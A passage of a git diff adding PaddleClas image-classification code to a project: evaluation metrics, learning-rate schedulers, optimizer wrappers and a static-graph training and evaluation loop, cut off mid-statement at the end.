choosen_indices) + equal_flag = paddle.equal(choosen_label, query_img_id) + if keep_mask is not None: + keep_mask = paddle.index_sample( + keep_mask.astype('float32'), choosen_indices) + equal_flag = paddle.logical_and(equal_flag, + keep_mask.astype('bool')) + equal_flag = paddle.cast(equal_flag, 'float32') + + Ns = paddle.arange(gallery_img_id.shape[0]) + 1 + equal_flag_cumsum = paddle.cumsum(equal_flag, axis=1) + Precision_at_k = (paddle.mean(equal_flag_cumsum, axis=0) / Ns).numpy() + + for k in self.topk: + metric_dict["precision@{}".format(k)] = Precision_at_k[k - 1] + + return metric_dict + + +class DistillationTopkAcc(TopkAcc): + def __init__(self, model_key, feature_key=None, topk=(1, 5)): + super().__init__(topk=topk) + self.model_key = model_key + self.feature_key = feature_key + + def forward(self, x, label): + x = x[self.model_key] + if self.feature_key is not None: + x = x[self.feature_key] + return super().forward(x, label) + + +class GoogLeNetTopkAcc(TopkAcc): + def __init__(self, topk=(1, 5)): + super().__init__() + assert isinstance(topk, (int, list, tuple)) + if isinstance(topk, int): + topk = [topk] + self.topk = topk + + def forward(self, x, label): + return super().forward(x[0], label) + + +class MutiLabelMetric(object): + def __init__(self): + pass + + def _multi_hot_encode(self, logits, threshold=0.5): + return binarize(logits, threshold=threshold) + + def __call__(self, output): + output = F.sigmoid(output) + preds = self._multi_hot_encode(logits=output.numpy(), threshold=0.5) + return preds + + +class HammingDistance(MutiLabelMetric): + """ + Soft metric based label for multilabel classification + Returns: + The smaller the return value is, the better model is. 
+ """ + + def __init__(self): + super().__init__() + + def __call__(self, output, target): + preds = super().__call__(output) + metric_dict = dict() + metric_dict["HammingDistance"] = paddle.to_tensor( + hamming_loss(target, preds)) + return metric_dict + + +class AccuracyScore(MutiLabelMetric): + """ + Hard metric for multilabel classification + Args: + base: ["sample", "label"], default="sample" + if "sample", return metric score based sample, + if "label", return metric score based label. + Returns: + accuracy: + """ + + def __init__(self, base="label"): + super().__init__() + assert base in ["sample", "label" + ], 'must be one of ["sample", "label"]' + self.base = base + + def __call__(self, output, target): + preds = super().__call__(output) + metric_dict = dict() + if self.base == "sample": + accuracy = accuracy_metric(target, preds) + elif self.base == "label": + mcm = multilabel_confusion_matrix(target, preds) + tns = mcm[:, 0, 0] + fns = mcm[:, 1, 0] + tps = mcm[:, 1, 1] + fps = mcm[:, 0, 1] + accuracy = (sum(tps) + sum(tns)) / ( + sum(tps) + sum(tns) + sum(fns) + sum(fps)) + precision = sum(tps) / (sum(tps) + sum(fps)) + recall = sum(tps) / (sum(tps) + sum(fns)) + F1 = 2 * (accuracy * recall) / (accuracy + recall) + metric_dict["AccuracyScore"] = paddle.to_tensor(accuracy) + return metric_dict diff --git a/Smart_container/PaddleClas/ppcls/optimizer/__init__.py b/Smart_container/PaddleClas/ppcls/optimizer/__init__.py new file mode 100644 index 0000000..cc64a9c --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/optimizer/__init__.py @@ -0,0 +1,71 @@ +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. 
+# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import copy +import paddle + +from ppcls.utils import logger + +from . import optimizer + +__all__ = ['build_optimizer'] + + +def build_lr_scheduler(lr_config, epochs, step_each_epoch): + from . import learning_rate + lr_config.update({'epochs': epochs, 'step_each_epoch': step_each_epoch}) + if 'name' in lr_config: + lr_name = lr_config.pop('name') + lr = getattr(learning_rate, lr_name)(**lr_config) + if isinstance(lr, paddle.optimizer.lr.LRScheduler): + return lr + else: + return lr() + else: + lr = lr_config['learning_rate'] + return lr + + +def build_optimizer(config, epochs, step_each_epoch, model_list): + config = copy.deepcopy(config) + # step1 build lr + lr = build_lr_scheduler(config.pop('lr'), epochs, step_each_epoch) + logger.debug("build lr ({}) success..".format(lr)) + # step2 build regularization + if 'regularizer' in config and config['regularizer'] is not None: + if 'weight_decay' in config: + logger.warning( + "ConfigError: Only one of regularizer and weight_decay can be set in Optimizer Config. \"weight_decay\" has been ignored." 
+ ) + reg_config = config.pop('regularizer') + reg_name = reg_config.pop('name') + 'Decay' + reg = getattr(paddle.regularizer, reg_name)(**reg_config) + config["weight_decay"] = reg + logger.debug("build regularizer ({}) success..".format(reg)) + # step3 build optimizer + optim_name = config.pop('name') + if 'clip_norm' in config: + clip_norm = config.pop('clip_norm') + grad_clip = paddle.nn.ClipGradByNorm(clip_norm=clip_norm) + else: + grad_clip = None + optim = getattr(optimizer, optim_name)(learning_rate=lr, + grad_clip=grad_clip, + **config)(model_list=model_list) + logger.debug("build optimizer ({}) success..".format(optim)) + return optim, lr diff --git a/Smart_container/PaddleClas/ppcls/optimizer/learning_rate.py b/Smart_container/PaddleClas/ppcls/optimizer/learning_rate.py new file mode 100644 index 0000000..b59387d --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/optimizer/learning_rate.py @@ -0,0 +1,326 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import (absolute_import, division, print_function, + unicode_literals) + +from paddle.optimizer import lr +from paddle.optimizer.lr import LRScheduler + +from ppcls.utils import logger + + +class Linear(object): + """ + Linear learning rate decay + Args: + lr (float): The initial learning rate. It is a python float number. + epochs(int): The decay step size. It determines the decay cycle. 
+ end_lr(float, optional): The minimum final learning rate. Default: 0.0001. + power(float, optional): Power of polynomial. Default: 1.0. + warmup_epoch(int): The epoch numbers for LinearWarmup. Default: 0. + warmup_start_lr(float): Initial learning rate of warm up. Default: 0.0. + last_epoch (int, optional): The index of last epoch. Can be set to restart training. Default: -1, means initial learning rate. + """ + + def __init__(self, + learning_rate, + epochs, + step_each_epoch, + end_lr=0.0, + power=1.0, + warmup_epoch=0, + warmup_start_lr=0.0, + last_epoch=-1, + **kwargs): + super().__init__() + if warmup_epoch >= epochs: + msg = f"When using warm up, the value of \"Global.epochs\" must be greater than value of \"Optimizer.lr.warmup_epoch\". The value of \"Optimizer.lr.warmup_epoch\" has been set to {epochs}." + logger.warning(msg) + warmup_epoch = epochs + self.learning_rate = learning_rate + self.steps = (epochs - warmup_epoch) * step_each_epoch + self.end_lr = end_lr + self.power = power + self.last_epoch = last_epoch + self.warmup_steps = round(warmup_epoch * step_each_epoch) + self.warmup_start_lr = warmup_start_lr + + def __call__(self): + learning_rate = lr.PolynomialDecay( + learning_rate=self.learning_rate, + decay_steps=self.steps, + end_lr=self.end_lr, + power=self.power, + last_epoch=self. + last_epoch) if self.steps > 0 else self.learning_rate + if self.warmup_steps > 0: + learning_rate = lr.LinearWarmup( + learning_rate=learning_rate, + warmup_steps=self.warmup_steps, + start_lr=self.warmup_start_lr, + end_lr=self.learning_rate, + last_epoch=self.last_epoch) + return learning_rate + + +class Cosine(object): + """ + Cosine learning rate decay + lr = 0.05 * (math.cos(epoch * (math.pi / epochs)) + 1) + Args: + lr(float): initial learning rate + step_each_epoch(int): steps each epoch + epochs(int): total training epochs + eta_min(float): Minimum learning rate. Default: 0.0. + warmup_epoch(int): The epoch numbers for LinearWarmup. Default: 0. 
+ warmup_start_lr(float): Initial learning rate of warm up. Default: 0.0. + last_epoch (int, optional): The index of last epoch. Can be set to restart training. Default: -1, means initial learning rate. + """ + + def __init__(self, + learning_rate, + step_each_epoch, + epochs, + eta_min=0.0, + warmup_epoch=0, + warmup_start_lr=0.0, + last_epoch=-1, + **kwargs): + super().__init__() + if warmup_epoch >= epochs: + msg = f"When using warm up, the value of \"Global.epochs\" must be greater than value of \"Optimizer.lr.warmup_epoch\". The value of \"Optimizer.lr.warmup_epoch\" has been set to {epochs}." + logger.warning(msg) + warmup_epoch = epochs + self.learning_rate = learning_rate + self.T_max = (epochs - warmup_epoch) * step_each_epoch + self.eta_min = eta_min + self.last_epoch = last_epoch + self.warmup_steps = round(warmup_epoch * step_each_epoch) + self.warmup_start_lr = warmup_start_lr + + def __call__(self): + learning_rate = lr.CosineAnnealingDecay( + learning_rate=self.learning_rate, + T_max=self.T_max, + eta_min=self.eta_min, + last_epoch=self. + last_epoch) if self.T_max > 0 else self.learning_rate + if self.warmup_steps > 0: + learning_rate = lr.LinearWarmup( + learning_rate=learning_rate, + warmup_steps=self.warmup_steps, + start_lr=self.warmup_start_lr, + end_lr=self.learning_rate, + last_epoch=self.last_epoch) + return learning_rate + + +class Step(object): + """ + Piecewise learning rate decay + Args: + step_each_epoch(int): steps each epoch + learning_rate (float): The initial learning rate. It is a python float number. + step_size (int): the interval to update. + gamma (float, optional): The Ratio that the learning rate will be reduced. ``new_lr = origin_lr * gamma`` . + It should be less than 1.0. Default: 0.1. + warmup_epoch(int): The epoch numbers for LinearWarmup. Default: 0. + warmup_start_lr(float): Initial learning rate of warm up. Default: 0.0. + last_epoch (int, optional): The index of last epoch. Can be set to restart training. 
Default: -1, means initial learning rate. + """ + + def __init__(self, + learning_rate, + step_size, + step_each_epoch, + epochs, + gamma, + warmup_epoch=0, + warmup_start_lr=0.0, + last_epoch=-1, + **kwargs): + super().__init__() + if warmup_epoch >= epochs: + msg = f"When using warm up, the value of \"Global.epochs\" must be greater than value of \"Optimizer.lr.warmup_epoch\". The value of \"Optimizer.lr.warmup_epoch\" has been set to {epochs}." + logger.warning(msg) + warmup_epoch = epochs + self.step_size = step_each_epoch * step_size + self.learning_rate = learning_rate + self.gamma = gamma + self.last_epoch = last_epoch + self.warmup_steps = round(warmup_epoch * step_each_epoch) + self.warmup_start_lr = warmup_start_lr + + def __call__(self): + learning_rate = lr.StepDecay( + learning_rate=self.learning_rate, + step_size=self.step_size, + gamma=self.gamma, + last_epoch=self.last_epoch) + if self.warmup_steps > 0: + learning_rate = lr.LinearWarmup( + learning_rate=learning_rate, + warmup_steps=self.warmup_steps, + start_lr=self.warmup_start_lr, + end_lr=self.learning_rate, + last_epoch=self.last_epoch) + return learning_rate + + +class Piecewise(object): + """ + Piecewise learning rate decay + Args: + boundaries(list): A list of steps numbers. The type of element in the list is python int. + values(list): A list of learning rate values that will be picked during different epoch boundaries. + The type of element in the list is python float. + warmup_epoch(int): The epoch numbers for LinearWarmup. Default: 0. + warmup_start_lr(float): Initial learning rate of warm up. Default: 0.0. + last_epoch (int, optional): The index of last epoch. Can be set to restart training. Default: -1, means initial learning rate. 
+ """ + + def __init__(self, + step_each_epoch, + decay_epochs, + values, + epochs, + warmup_epoch=0, + warmup_start_lr=0.0, + last_epoch=-1, + **kwargs): + super().__init__() + if warmup_epoch >= epochs: + msg = f"When using warm up, the value of \"Global.epochs\" must be greater than value of \"Optimizer.lr.warmup_epoch\". The value of \"Optimizer.lr.warmup_epoch\" has been set to {epochs}." + logger.warning(msg) + warmup_epoch = epochs + self.boundaries = [step_each_epoch * e for e in decay_epochs] + self.values = values + self.last_epoch = last_epoch + self.warmup_steps = round(warmup_epoch * step_each_epoch) + self.warmup_start_lr = warmup_start_lr + + def __call__(self): + learning_rate = lr.PiecewiseDecay( + boundaries=self.boundaries, + values=self.values, + last_epoch=self.last_epoch) + if self.warmup_steps > 0: + learning_rate = lr.LinearWarmup( + learning_rate=learning_rate, + warmup_steps=self.warmup_steps, + start_lr=self.warmup_start_lr, + end_lr=self.values[0], + last_epoch=self.last_epoch) + return learning_rate + + +class MultiStepDecay(LRScheduler): + """ + Update the learning rate by ``gamma`` once ``epoch`` reaches one of the milestones. + The algorithm can be described as the code below. + .. code-block:: text + learning_rate = 0.5 + milestones = [30, 50] + gamma = 0.1 + if epoch < 30: + learning_rate = 0.5 + elif epoch < 50: + learning_rate = 0.05 + else: + learning_rate = 0.005 + Args: + learning_rate (float): The initial learning rate. It is a python float number. + milestones (tuple|list): List or tuple of each boundaries. Must be increasing. + gamma (float, optional): The Ratio that the learning rate will be reduced. ``new_lr = origin_lr * gamma`` . + It should be less than 1.0. Default: 0.1. + last_epoch (int, optional): The index of last epoch. Can be set to restart training. Default: -1, means initial learning rate. + verbose (bool, optional): If ``True``, prints a message to stdout for each update. Default: ``False`` . 
+ + Returns: + ``MultiStepDecay`` instance to schedule learning rate. + Examples: + + .. code-block:: python + import paddle + import numpy as np + # train on default dynamic graph mode + linear = paddle.nn.Linear(10, 10) + scheduler = paddle.optimizer.lr.MultiStepDecay(learning_rate=0.5, milestones=[2, 4, 6], gamma=0.8, verbose=True) + sgd = paddle.optimizer.SGD(learning_rate=scheduler, parameters=linear.parameters()) + for epoch in range(20): + for batch_id in range(5): + x = paddle.uniform([10, 10]) + out = linear(x) + loss = paddle.mean(out) + loss.backward() + sgd.step() + sgd.clear_gradients() + scheduler.step() # If you update learning rate each step + # scheduler.step() # If you update learning rate each epoch + # train on static graph mode + paddle.enable_static() + main_prog = paddle.static.Program() + start_prog = paddle.static.Program() + with paddle.static.program_guard(main_prog, start_prog): + x = paddle.static.data(name='x', shape=[None, 4, 5]) + y = paddle.static.data(name='y', shape=[None, 4, 5]) + z = paddle.static.nn.fc(x, 100) + loss = paddle.mean(z) + scheduler = paddle.optimizer.lr.MultiStepDecay(learning_rate=0.5, milestones=[2, 4, 6], gamma=0.8, verbose=True) + sgd = paddle.optimizer.SGD(learning_rate=scheduler) + sgd.minimize(loss) + exe = paddle.static.Executor() + exe.run(start_prog) + for epoch in range(20): + for batch_id in range(5): + out = exe.run( + main_prog, + feed={ + 'x': np.random.randn(3, 4, 5).astype('float32'), + 'y': np.random.randn(3, 4, 5).astype('float32') + }, + fetch_list=loss.name) + scheduler.step() # If you update learning rate each step + # scheduler.step() # If you update learning rate each epoch + """ + + def __init__(self, + learning_rate, + milestones, + epochs, + step_each_epoch, + gamma=0.1, + last_epoch=-1, + verbose=False): + if not isinstance(milestones, (tuple, list)): + raise TypeError( + "The type of 'milestones' in 'MultiStepDecay' must be 'tuple, list', but received %s." 
+ % type(milestones)) + if not all([ + milestones[i] < milestones[i + 1] + for i in range(len(milestones) - 1) + ]): + raise ValueError('The elements of milestones must be incremented') + if gamma >= 1.0: + raise ValueError('gamma should be < 1.0.') + self.milestones = [x * step_each_epoch for x in milestones] + self.gamma = gamma + super().__init__(learning_rate, last_epoch, verbose) + + def get_lr(self): + for i in range(len(self.milestones)): + if self.last_epoch < self.milestones[i]: + return self.base_lr * (self.gamma**i) + return self.base_lr * (self.gamma**len(self.milestones)) diff --git a/Smart_container/PaddleClas/ppcls/optimizer/optimizer.py b/Smart_container/PaddleClas/ppcls/optimizer/optimizer.py new file mode 100644 index 0000000..72310f2 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/optimizer/optimizer.py @@ -0,0 +1,189 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +from paddle import optimizer as optim + + +class Momentum(object): + """ + Simple Momentum optimizer with velocity state. + Args: + learning_rate (float|Variable) - The learning rate used to update parameters. + Can be a float value or a Variable with one float value as data element. + momentum (float) - Momentum factor. 
+ regularization (WeightDecayRegularizer, optional) - The strategy of regularization. + """ + + def __init__(self, + learning_rate, + momentum, + weight_decay=None, + grad_clip=None, + multi_precision=False): + super().__init__() + self.learning_rate = learning_rate + self.momentum = momentum + self.weight_decay = weight_decay + self.grad_clip = grad_clip + self.multi_precision = multi_precision + + def __call__(self, model_list): + parameters = sum([m.parameters() for m in model_list], []) + opt = optim.Momentum( + learning_rate=self.learning_rate, + momentum=self.momentum, + weight_decay=self.weight_decay, + grad_clip=self.grad_clip, + multi_precision=self.multi_precision, + parameters=parameters) + return opt + + +class Adam(object): + def __init__(self, + learning_rate=0.001, + beta1=0.9, + beta2=0.999, + epsilon=1e-08, + parameter_list=None, + weight_decay=None, + grad_clip=None, + name=None, + lazy_mode=False, + multi_precision=False): + self.learning_rate = learning_rate + self.beta1 = beta1 + self.beta2 = beta2 + self.epsilon = epsilon + self.parameter_list = parameter_list + self.learning_rate = learning_rate + self.weight_decay = weight_decay + self.grad_clip = grad_clip + self.name = name + self.lazy_mode = lazy_mode + self.multi_precision = multi_precision + + def __call__(self, model_list): + parameters = sum([m.parameters() for m in model_list], []) + opt = optim.Adam( + learning_rate=self.learning_rate, + beta1=self.beta1, + beta2=self.beta2, + epsilon=self.epsilon, + weight_decay=self.weight_decay, + grad_clip=self.grad_clip, + name=self.name, + lazy_mode=self.lazy_mode, + multi_precision=self.multi_precision, + parameters=parameters) + return opt + + +class RMSProp(object): + """ + Root Mean Squared Propagation (RMSProp) is an unpublished, adaptive learning rate method. + Args: + learning_rate (float|Variable) - The learning rate used to update parameters. + Can be a float value or a Variable with one float value as data element. 
+ momentum (float) - Momentum factor. + rho (float) - rho value in equation. + epsilon (float) - avoid division by zero, default is 1e-6. + regularization (WeightDecayRegularizer, optional) - The strategy of regularization. + """ + + def __init__(self, + learning_rate, + momentum=0.0, + rho=0.95, + epsilon=1e-6, + weight_decay=None, + grad_clip=None, + multi_precision=False): + super().__init__() + self.learning_rate = learning_rate + self.momentum = momentum + self.rho = rho + self.epsilon = epsilon + self.weight_decay = weight_decay + self.grad_clip = grad_clip + + def __call__(self, model_list): + parameters = sum([m.parameters() for m in model_list], []) + opt = optim.RMSProp( + learning_rate=self.learning_rate, + momentum=self.momentum, + rho=self.rho, + epsilon=self.epsilon, + weight_decay=self.weight_decay, + grad_clip=self.grad_clip, + parameters=parameters) + return opt + + +class AdamW(object): + def __init__(self, + learning_rate=0.001, + beta1=0.9, + beta2=0.999, + epsilon=1e-8, + weight_decay=None, + multi_precision=False, + grad_clip=None, + no_weight_decay_name=None, + one_dim_param_no_weight_decay=False, + **args): + super().__init__() + self.learning_rate = learning_rate + self.beta1 = beta1 + self.beta2 = beta2 + self.epsilon = epsilon + self.grad_clip = grad_clip + self.weight_decay = weight_decay + self.multi_precision = multi_precision + self.no_weight_decay_name_list = no_weight_decay_name.split( + ) if no_weight_decay_name else [] + self.one_dim_param_no_weight_decay = one_dim_param_no_weight_decay + + def __call__(self, model_list): + parameters = sum([m.parameters() for m in model_list], []) + + self.no_weight_decay_param_name_list = [ + p.name for model in model_list for n, p in model.named_parameters() + if any(nd in n for nd in self.no_weight_decay_name_list) + ] + + if self.one_dim_param_no_weight_decay: + self.no_weight_decay_param_name_list += [ + p.name for model in model_list + for n, p in model.named_parameters() if len(p.shape) == 
1 + ] + + opt = optim.AdamW( + learning_rate=self.learning_rate, + beta1=self.beta1, + beta2=self.beta2, + epsilon=self.epsilon, + parameters=parameters, + weight_decay=self.weight_decay, + multi_precision=self.multi_precision, + grad_clip=self.grad_clip, + apply_decay_param_fun=self._apply_decay_param_fun) + return opt + + def _apply_decay_param_fun(self, name): + return name not in self.no_weight_decay_param_name_list diff --git a/Smart_container/PaddleClas/ppcls/static/program.py b/Smart_container/PaddleClas/ppcls/static/program.py new file mode 100644 index 0000000..34608fc --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/static/program.py @@ -0,0 +1,445 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import os +import time +import numpy as np + +from collections import OrderedDict + +import paddle +import paddle.nn.functional as F + +from paddle.distributed import fleet +from paddle.distributed.fleet import DistributedStrategy + +# from ppcls.optimizer import OptimizerBuilder +# from ppcls.optimizer.learning_rate import LearningRateBuilder + +from ppcls.arch import build_model +from ppcls.loss import build_loss +from ppcls.metric import build_metrics +from ppcls.optimizer import build_optimizer +from ppcls.optimizer import build_lr_scheduler + +from ppcls.utils.misc import AverageMeter +from ppcls.utils import logger, profiler + + +def create_feeds(image_shape, use_mix=None, dtype="float32"): + """ + Create feeds as model input + + Args: + image_shape(list[int]): model input shape, such as [3, 224, 224] + use_mix(bool): whether to use mix(include mixup, cutmix, fmix) + + Returns: + feeds(dict): dict of model input variables + """ + feeds = OrderedDict() + feeds['data'] = paddle.static.data( + name="data", shape=[None] + image_shape, dtype=dtype) + if use_mix: + feeds['y_a'] = paddle.static.data( + name="y_a", shape=[None, 1], dtype="int64") + feeds['y_b'] = paddle.static.data( + name="y_b", shape=[None, 1], dtype="int64") + feeds['lam'] = paddle.static.data( + name="lam", shape=[None, 1], dtype=dtype) + else: + feeds['label'] = paddle.static.data( + name="label", shape=[None, 1], dtype="int64") + + return feeds + + +def create_fetchs(out, + feeds, + architecture, + topk=5, + epsilon=None, + use_mix=False, + config=None, + mode="Train"): + """ + Create fetchs as model outputs(included loss and measures), + will call create_loss and create_metric(if use_mix). + Args: + out(variable): model output variable + feeds(dict): dict of model input variables. + If use mix_up, it will not include label. 
+ architecture(dict): architecture information, + name(such as ResNet50) is needed + topk(int): usually top5 + epsilon(float): parameter for label smoothing, 0.0 <= epsilon <= 1.0 + use_mix(bool): whether to use mix(include mixup, cutmix, fmix) + config(dict): model config + + Returns: + fetchs(dict): dict of model outputs(included loss and measures) + """ + fetchs = OrderedDict() + # build loss + if use_mix: + y_a = paddle.reshape(feeds['y_a'], [-1, 1]) + y_b = paddle.reshape(feeds['y_b'], [-1, 1]) + lam = paddle.reshape(feeds['lam'], [-1, 1]) + else: + target = paddle.reshape(feeds['label'], [-1, 1]) + + loss_func = build_loss(config["Loss"][mode]) + + if use_mix: + loss_dict = loss_func(out, [y_a, y_b, lam]) + else: + loss_dict = loss_func(out, target) + + loss_out = loss_dict["loss"] + fetchs['loss'] = (loss_out, AverageMeter('loss', '7.4f', need_avg=True)) + + # build metric + if not use_mix: + metric_func = build_metrics(config["Metric"][mode]) + + metric_dict = metric_func(out, target) + + for key in metric_dict: + if mode != "Train" and paddle.distributed.get_world_size() > 1: + paddle.distributed.all_reduce( + metric_dict[key], op=paddle.distributed.ReduceOp.SUM) + metric_dict[key] = metric_dict[ + key] / paddle.distributed.get_world_size() + + fetchs[key] = (metric_dict[key], AverageMeter( + key, '7.4f', need_avg=True)) + + return fetchs + + +def create_optimizer(config, step_each_epoch): + # create learning_rate instance + optimizer, lr_sch = build_optimizer( + config["Optimizer"], config["Global"]["epochs"], step_each_epoch) + return optimizer, lr_sch + + +def create_strategy(config): + """ + Create build strategy and exec strategy. 
+ + Args: + config(dict): config + + Returns: + build_strategy: build strategy + exec_strategy: exec strategy + """ + build_strategy = paddle.static.BuildStrategy() + exec_strategy = paddle.static.ExecutionStrategy() + + exec_strategy.num_threads = 1 + exec_strategy.num_iteration_per_drop_scope = ( + 10000 + if 'AMP' in config and config.AMP.get("use_pure_fp16", False) else 10) + + fuse_op = True if 'AMP' in config else False + + fuse_bn_act_ops = config.get('fuse_bn_act_ops', fuse_op) + fuse_elewise_add_act_ops = config.get('fuse_elewise_add_act_ops', fuse_op) + fuse_bn_add_act_ops = config.get('fuse_bn_add_act_ops', fuse_op) + enable_addto = config.get('enable_addto', fuse_op) + + build_strategy.fuse_bn_act_ops = fuse_bn_act_ops + build_strategy.fuse_elewise_add_act_ops = fuse_elewise_add_act_ops + build_strategy.fuse_bn_add_act_ops = fuse_bn_add_act_ops + build_strategy.enable_addto = enable_addto + + return build_strategy, exec_strategy + + +def dist_optimizer(config, optimizer): + """ + Create a distributed optimizer based on a normal optimizer + + Args: + config(dict): + optimizer(): a normal optimizer + + Returns: + optimizer: a distributed optimizer + """ + build_strategy, exec_strategy = create_strategy(config) + + dist_strategy = DistributedStrategy() + dist_strategy.execution_strategy = exec_strategy + dist_strategy.build_strategy = build_strategy + + dist_strategy.nccl_comm_num = 1 + dist_strategy.fuse_all_reduce_ops = True + dist_strategy.fuse_grad_size_in_MB = 16 + optimizer = fleet.distributed_optimizer(optimizer, strategy=dist_strategy) + + return optimizer + + +def mixed_precision_optimizer(config, optimizer): + if 'AMP' in config: + amp_cfg = config.AMP if config.AMP else dict() + scale_loss = amp_cfg.get('scale_loss', 1.0) + use_dynamic_loss_scaling = amp_cfg.get('use_dynamic_loss_scaling', + False) + use_pure_fp16 = amp_cfg.get('use_pure_fp16', False) + optimizer = paddle.static.amp.decorate( + optimizer, + init_loss_scaling=scale_loss, + 
use_dynamic_loss_scaling=use_dynamic_loss_scaling, + use_pure_fp16=use_pure_fp16, + use_fp16_guard=True) + + return optimizer + + +def build(config, + main_prog, + startup_prog, + step_each_epoch=100, + is_train=True, + is_distributed=True): + """ + Build a program using a model and an optimizer + 1. create feeds + 2. create a dataloader + 3. create a model + 4. create fetchs + 5. create an optimizer + + Args: + config(dict): config + main_prog(): main program + startup_prog(): startup program + is_train(bool): train or eval + is_distributed(bool): whether to use distributed training method + + Returns: + dataloader(): a bridge between the model and the data + fetchs(dict): dict of model outputs(included loss and measures) + """ + with paddle.static.program_guard(main_prog, startup_prog): + with paddle.utils.unique_name.guard(): + mode = "Train" if is_train else "Eval" + use_mix = "batch_transform_ops" in config["DataLoader"][mode][ + "dataset"] + use_dali = config["Global"].get('use_dali', False) + feeds = create_feeds( + config["Global"]["image_shape"], + use_mix=use_mix, + dtype="float32") + + # build model + # data_format should be assigned in arch-dict + input_image_channel = config["Global"]["image_shape"][ + 0] # default as [3, 224, 224] + model = build_model(config["Arch"]) + out = model(feeds["data"]) + # end of build model + + fetchs = create_fetchs( + out, + feeds, + config["Arch"], + epsilon=config.get('ls_epsilon'), + use_mix=use_mix, + config=config, + mode=mode) + lr_scheduler = None + optimizer = None + if is_train: + optimizer, lr_scheduler = build_optimizer( + config["Optimizer"], config["Global"]["epochs"], + step_each_epoch) + optimizer = mixed_precision_optimizer(config, optimizer) + if is_distributed: + optimizer = dist_optimizer(config, optimizer) + optimizer.minimize(fetchs['loss'][0]) + return fetchs, lr_scheduler, feeds, optimizer + + +def compile(config, program, loss_name=None, share_prog=None): + """ + Compile the program + + Args: + 
config(dict): config + program(): the program which is wrapped by + loss_name(str): loss name + share_prog(): the shared program, used for evaluation during training + + Returns: + compiled_program(): a compiled program + """ + build_strategy, exec_strategy = create_strategy(config) + + compiled_program = paddle.static.CompiledProgram( + program).with_data_parallel( + share_vars_from=share_prog, + loss_name=loss_name, + build_strategy=build_strategy, + exec_strategy=exec_strategy) + + return compiled_program + + +total_step = 0 + + +def run(dataloader, + exe, + program, + feeds, + fetchs, + epoch=0, + mode='train', + config=None, + vdl_writer=None, + lr_scheduler=None, + profiler_options=None): + """ + Feed data to the model and fetch the measures and loss + + Args: + dataloader(paddle io dataloader): + exe(): + program(): + fetchs(dict): dict of measures and the loss + epoch(int): epoch of training or evaluation + model(str): log only + + Returns: + """ + fetch_list = [f[0] for f in fetchs.values()] + metric_dict = OrderedDict([("lr", AverageMeter( + 'lr', 'f', postfix=",", need_avg=False))]) + + for k in fetchs: + metric_dict[k] = fetchs[k][1] + + metric_dict["batch_time"] = AverageMeter( + 'batch_cost', '.5f', postfix=" s,") + metric_dict["reader_time"] = AverageMeter( + 'reader_cost', '.5f', postfix=" s,") + + for m in metric_dict.values(): + m.reset() + + use_dali = config["Global"].get('use_dali', False) + tic = time.time() + + if not use_dali: + dataloader = dataloader() + + idx = 0 + batch_size = None + while True: + # The DALI maybe raise RuntimeError for some particular images, such as ImageNet1k/n04418357_26036.JPEG + try: + batch = next(dataloader) + except StopIteration: + break + except RuntimeError: + logger.warning( + "Except RuntimeError when reading data from dataloader, try to read once again..." 
+ ) + continue + idx += 1 + # ignore the warmup iters + if idx == 5: + metric_dict["batch_time"].reset() + metric_dict["reader_time"].reset() + + metric_dict['reader_time'].update(time.time() - tic) + + profiler.add_profiler_step(profiler_options) + + if use_dali: + batch_size = batch[0]["data"].shape()[0] + feed_dict = batch[0] + else: + batch_size = batch[0].shape()[0] + feed_dict = { + key.name: batch[idx] + for idx, key in enumerate(feeds.values()) + } + + metrics = exe.run(program=program, + feed=feed_dict, + fetch_list=fetch_list) + + for name, m in zip(fetchs.keys(), metrics): + metric_dict[name].update(np.mean(m), batch_size) + metric_dict["batch_time"].update(time.time() - tic) + if mode == "train": + metric_dict['lr'].update(lr_scheduler.get_lr()) + + fetchs_str = ' '.join([ + str(metric_dict[key].mean) + if "time" in key else str(metric_dict[key].value) + for key in metric_dict + ]) + ips_info = " ips: {:.5f} images/sec.".format( + batch_size / metric_dict["batch_time"].avg) + fetchs_str += ips_info + + if lr_scheduler is not None: + lr_scheduler.step() + + if vdl_writer: + global total_step + logger.scaler('loss', metrics[0][0], total_step, vdl_writer) + total_step += 1 + if mode == 'eval': + if idx % config.get('print_interval', 10) == 0: + logger.info("{:s} step:{:<4d} {:s}".format(mode, idx, + fetchs_str)) + else: + epoch_str = 